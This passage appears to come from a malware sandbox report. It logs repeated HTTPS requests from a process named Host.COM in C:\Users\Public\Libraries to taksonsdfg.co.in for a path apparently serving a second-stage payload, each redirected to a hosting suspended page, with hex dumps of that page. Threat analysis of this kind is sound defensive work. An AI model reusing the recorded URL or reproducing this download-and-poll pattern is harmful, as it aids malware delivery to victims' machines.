.additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49783	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:39 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:40 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:39 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:40 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49787	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:41 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:41 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:41 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:41 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:41 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49794	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:43 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:44 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:43 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:44 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49799	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:45 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:46 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:46 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:46 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:46 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49806	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:48 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:48 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:48 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:48 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49812	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:49 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:50 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:50 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:50 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:50 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49819	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:52 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:52 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:52 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:52 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49825	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:54 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:54 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:54 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:54 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:38:54 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:38:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49832	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:56 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:57 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:38:56 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:57 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49838	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:38:58 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:38:59 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:38:59 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:38:59 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
